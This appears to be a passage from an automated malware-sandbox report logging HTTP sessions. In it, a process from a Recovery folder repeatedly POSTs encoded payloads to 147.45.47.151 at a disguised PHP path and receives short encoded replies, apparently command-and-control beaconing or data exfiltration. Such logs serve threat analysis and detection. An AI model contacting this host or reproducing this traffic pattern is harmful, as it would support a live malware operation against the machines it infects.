                                                                                          Data Ascii: R\__^XUQXWZWRUQ\[Y]BW^PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_%/4*"&>>\3 \$*4S69<+')8)4"'Z99.\%!Z+
                                                                                          Dec 10, 2024 07:29:43.534255028 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:43.768610954 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:43 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          62192.168.2.849877147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:44.788767099 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2500
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:45.147650003 CET2500OUTData Raw: 57 5b 5a 5a 5e 5f 55 5d 58 57 5a 57 52 55 51 54 5b 5b 5d 49 57 51 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZZ^_U]XWZWRUQT[[]IWQPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2,77#&Z=>?^3?#$)$U!>+;8S+;1_7;Z-.\%!Z+,
                                                                                          Dec 10, 2024 07:29:46.049194098 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:46.284291983 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          63192.168.2.849882147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:46.556296110 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:29:46.913300991 CET2512OUTData Raw: 52 5a 5a 5f 5b 5c 55 5f 58 57 5a 57 52 54 51 50 5b 5e 5d 40 57 5e 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZZ_[\U_XWZWRTQP[^]@W^PU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%<#)6P66*(-(3<;'\<6>Z(; +;[48-.\%!Z+
                                                                                          Dec 10, 2024 07:29:47.819848061 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:48.057557106 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          64192.168.2.849886147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:48.358995914 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:48.710134029 CET2512OUTData Raw: 52 59 5f 59 5e 5e 50 5c 58 57 5a 57 52 53 51 57 5b 59 5d 41 57 52 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RY_Y^^P\XWZWRSQW[Y]AWRP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\24\4*>"2)>?]0%*5>%?8,)()_ (:).\%!Z+<
                                                                                          Dec 10, 2024 07:29:49.557241917 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:49.792318106 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          65192.168.2.849889147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:48.536530018 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:48.882076979 CET2004OUTData Raw: 52 5e 5a 58 5e 5d 55 51 58 57 5a 57 52 52 51 5d 5b 5b 5d 46 57 5e 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^ZX^]UQXWZWRRQ][[]FW^PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&79"P"&>=>3Y+$\ 62(;<++9[ 7]..\%!Z+
                                                                                          Dec 10, 2024 07:29:49.797220945 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:50.032656908 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 07 37 2a 2f 1f 32 0d 3b 0a 2f 1f 09 1c 31 13 2f 40 3e 22 3a 14 31 3b 2b 19 2e 21 34 09 2a 03 31 10 28 5c 2b 0d 3e 11 27 56 24 0f 21 46 0c 1d 24 5d 24 02 32 5d 27 13 0a 04 24 59 23 12 27 21 23 15 29 0d 23 0a 20 23 0d 5e 33 0a 2b 0d 3b 5b 2e 57 2c 43 25 1b 3d 32 35 0d 26 28 22 57 0d 12 27 52 26 30 35 58 22 21 3a 1e 22 1f 06 1e 3c 25 20 58 27 2e 34 00 23 3a 13 13 33 0f 0e 5b 20 51 20 11 3c 3b 00 10 25 04 31 09 33 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&7*/2;/1/@>":1;+.!4*1(\+>'V$!F$]$2]'$Y#'!#)# #^3+;[.W,C%=25&("W'R&05X"!:"<% X'.4#:3[ Q <;%13 ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          66192.168.2.849891147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:50.071717024 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:50.429152012 CET2504OUTData Raw: 57 58 5a 59 5e 5b 55 5f 58 57 5a 57 52 55 51 57 5b 5d 5d 42 57 50 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WXZY^[U_XWZWRUQW[]]BWPP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1(49"=>,$ ': R!9+;$P=;:#17[.).\%!Z+(
                                                                                          Dec 10, 2024 07:29:51.339764118 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:51.572602987 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          67192.168.2.849897147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:51.834342003 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:52.181715012 CET2512OUTData Raw: 57 59 5a 5a 5b 5e 55 59 58 57 5a 57 52 5d 51 5c 5b 5d 5d 49 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZZ[^UYXWZWR]Q\[]]IWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&<,!:P6^>/$<4%*(5>X<0Q)+& +[-).\%!Z+
                                                                                          Dec 10, 2024 07:29:53.095438004 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:53.328442097 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          68192.168.2.849903147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:53.606560946 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:53.960288048 CET2512OUTData Raw: 57 51 5f 58 5b 5b 50 5b 58 57 5a 57 52 57 51 50 5b 59 5d 41 57 54 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_X[[P[XWZWRWQP[Y]AWTPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"%+7:65"*>70?#$\?!?8')642+[:).\%!Z+,
                                                                                          Dec 10, 2024 07:29:54.867449045 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:55.100514889 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          69192.168.2.849908147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:55.158580065 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:55.515443087 CET1992OUTData Raw: 57 5b 5a 5a 5b 5c 55 5d 58 57 5a 57 52 55 51 53 5b 5d 5d 41 57 5e 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZZ[\U]XWZWRUQS[]]AW^P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2,? 96#%5_*.'Y#$ V5%)(V*9#"\..\%!Z+
                                                                                          Dec 10, 2024 07:29:56.419462919 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:56.657130957 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 01 37 29 27 58 32 1d 33 0c 2c 32 2f 1c 25 13 3f 41 3e 22 32 16 32 01 37 16 3a 0c 3f 54 3d 03 39 13 28 04 2c 11 2a 3f 2f 53 33 35 21 46 0c 1d 24 15 27 3b 21 07 24 13 2b 5c 30 01 0a 00 30 0b 24 01 2a 0d 2b 0c 23 0a 33 5c 33 33 23 08 2c 2e 3a 56 2c 0b 21 1b 29 0c 0c 54 25 02 22 57 0d 12 24 08 24 23 3a 06 22 22 2e 54 36 22 34 1f 29 35 2c 58 33 58 2b 10 35 03 2a 03 24 21 01 01 23 27 0e 11 28 28 2d 05 24 3d 3d 0f 24 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&7)'X23,2/%?A>"227:?T=9(,*?/S35!F$';!$+\00$*+#3\33#,.:V,!)T%"W$$#:"".T6"4)5,X3X+5*$!#'((-$==$+ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          70192.168.2.849909147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:55.360614061 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:55.710169077 CET2512OUTData Raw: 57 50 5a 5d 5e 5a 55 5a 58 57 5a 57 52 53 51 57 5b 5d 5d 47 57 56 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZ]^ZUZXWZWRSQW[]]GWVP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%0] 9!5(>#0,7'!=%](;<)+4! 9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:56.624278069 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:56.856590033 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          71192.168.2.849915147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:57.093425035 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:57.444430113 CET2512OUTData Raw: 52 5b 5a 59 5e 59 55 5f 58 57 5a 57 52 52 51 52 5b 5d 5d 41 57 51 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[ZY^YU_XWZWRRQR[]]AWQPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!1,\49="==+Z$0^0)7".( )%X71']/9.\%!Z+
                                                                                          Dec 10, 2024 07:29:58.355387926 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:58.588583946 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          72192.168.2.849917147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:58.845568895 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:59.194462061 CET2504OUTData Raw: 57 5e 5a 5e 5e 5b 55 5b 58 57 5a 57 52 55 51 5d 5b 5b 5d 45 57 56 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^Z^^[U[XWZWRUQ][[]EWVP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_'//796V61Y(=+]3< ':U52(;#)+:!"'9.\%!Z+
                                                                                          Dec 10, 2024 07:30:00.107903957 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:00.340565920 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          73192.168.2.849923147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:00.577135086 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:00.929562092 CET2512OUTData Raw: 57 5a 5f 5b 5b 5b 55 59 58 57 5a 57 52 50 51 55 5b 51 5d 42 57 53 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_[[[UYXWZWRPQU[Q]BWSP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2?,#)9!&)Z)-4''3+".*<8 W=8%_7;Z99.\%!Z+0
                                                                                          Dec 10, 2024 07:30:01.838671923 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:02.072525978 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          74192.168.2.849928147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:01.784426928 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:02.132056952 CET2004OUTData Raw: 57 5b 5f 59 5b 59 55 5b 58 57 5a 57 52 56 51 57 5b 5d 5d 48 57 55 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
